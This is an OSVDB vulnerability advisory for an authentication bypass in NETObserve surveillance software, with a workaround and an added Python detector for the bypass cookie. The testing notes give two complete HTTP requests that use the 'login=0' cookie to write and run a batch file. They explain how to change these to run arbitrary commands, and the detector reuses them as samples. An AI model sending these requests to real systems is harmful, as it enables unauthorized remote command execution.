NETObserve User Authentication Bypass

2003-12-30T04:24:47
ID OSVDB:3256
Type osvdb
Reporter OSVDB
Modified 2003-12-30T04:24:47

Description

Vulnerability Description

The NETObserve PC surveillance software uses a web service to provide remote access to the monitored PC. This web service requires a username and password for access; however, this authentication can be bypassed by supplying the cookie value 'login=0'. Once access has been obtained, all features of the NETObserve system are available, including the ability to upload files and execute commands.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s):

Configure the NETObserve service to only allow trusted IP addresses to connect.

Short Description

The NETObserve PC surveillance software uses a web service to provide remote access to the monitored PC. This web service requires a username and password for access; however, this authentication can be bypassed by supplying the cookie value 'login=0'. Once access has been obtained, all features of the NETObserve system are available, including the ability to upload files and execute commands.

Manual Testing Notes

The following two HTTP requests will execute commands via the Windows command interpreter on the remote system:

REQUEST #1:

POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc

REQUEST #2:

GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0

To change the commands to be run, alter the 'Content-Length' header of the first request so that it equals the length of the posted line, including the string 'newfiledata='. Then alter the data posted under 'newfiledata', remembering to replace spaces with '+' and to URL-encode common HTTP metacharacters as hexadecimal values (for example '/' becomes '%2F', as above).

These specific requests, sent unaltered, will launch the Windows calculator.
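A detection helper for the bypass described in these notes, added here as an example and not part of the OSVDB record or the vendor's software. It assumes raw HTTP request text as captured by a proxy or IDS sensor, and tags requests that carry the 'login=0' cookie or target the file-edit and file-run endpoints named above; the sample requests are constructed from the two shown in the notes plus one benign fetch.

```python
"""Detection helper for the NETObserve 'login=0' cookie bypass (OSVDB 3256).
Added example, not part of the advisory: tags raw HTTP requests that carry
the bypass cookie or target the file-edit / file-run endpoints it names."""
import re

# Endpoints used in the advisory's manual testing notes.
SENSITIVE_PATHS = ("/sendeditfile", "/runfile=")
# Cookie value the advisory says the service accepts in place of a login.
BYPASS_COOKIE = re.compile(r"(?:^|;\s*)login=0\s*(?:;|$)")


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def classify(raw):
    """Return detection tags for one request; an empty list means no finding."""
    req = parse_request(raw)
    tags = []
    if BYPASS_COOKIE.search(req["headers"].get("cookie", "")):
        tags.append("login0-bypass-cookie")
    if req["target"].startswith(SENSITIVE_PATHS):
        tags.append("sensitive-endpoint")
    if req["method"] == "POST" and "newfiledata=" in req["body"]:
        tags.append("remote-file-write")
    return tags


# Constructed samples: the advisory's two requests, plus a benign page fetch.
REQUEST_1 = ("POST /sendeditfile HTTP/1.1\r\nAccept: */*\r\n"
             "Referer: http://127.0.0.1/editfile=?C:\\WINDOWS\\win.bat?\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n"
             "Host: AnyHostWillDo\r\nContent-Length: 25\r\nCookie: login=0\r\n"
             "\r\nnewfiledata=cmd+%2Fc+calc")
REQUEST_2 = ("GET /runfile=?C:\\windows\\win.bat? HTTP/1.1\r\nAccept: */*\r\n"
             "Host: AnyHostWillDo\r\nCookie: login=0\r\n\r\n")
BENIGN = "GET /status HTTP/1.1\r\nHost: AnyHostWillDo\r\nCookie: login=1\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("request 1", REQUEST_1), ("request 2", REQUEST_2), ("benign", BENIGN)):
        print(name, classify(raw) or "no finding")
```

Any hit on 'login0-bypass-cookie' from a source outside the trusted address list used in the workaround above is worth an alert on its own, since a legitimately authenticated session has no reason to present that value.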

References:

Vendor URL: http://www.exploreanywhere.com/no-intro.php
Secunia Advisory ID: 10511
Other Advisory URL: http://www.elitehaven.net/netobserve.txt
Nessus Plugin ID: 11971
Bugtraq ID: 9319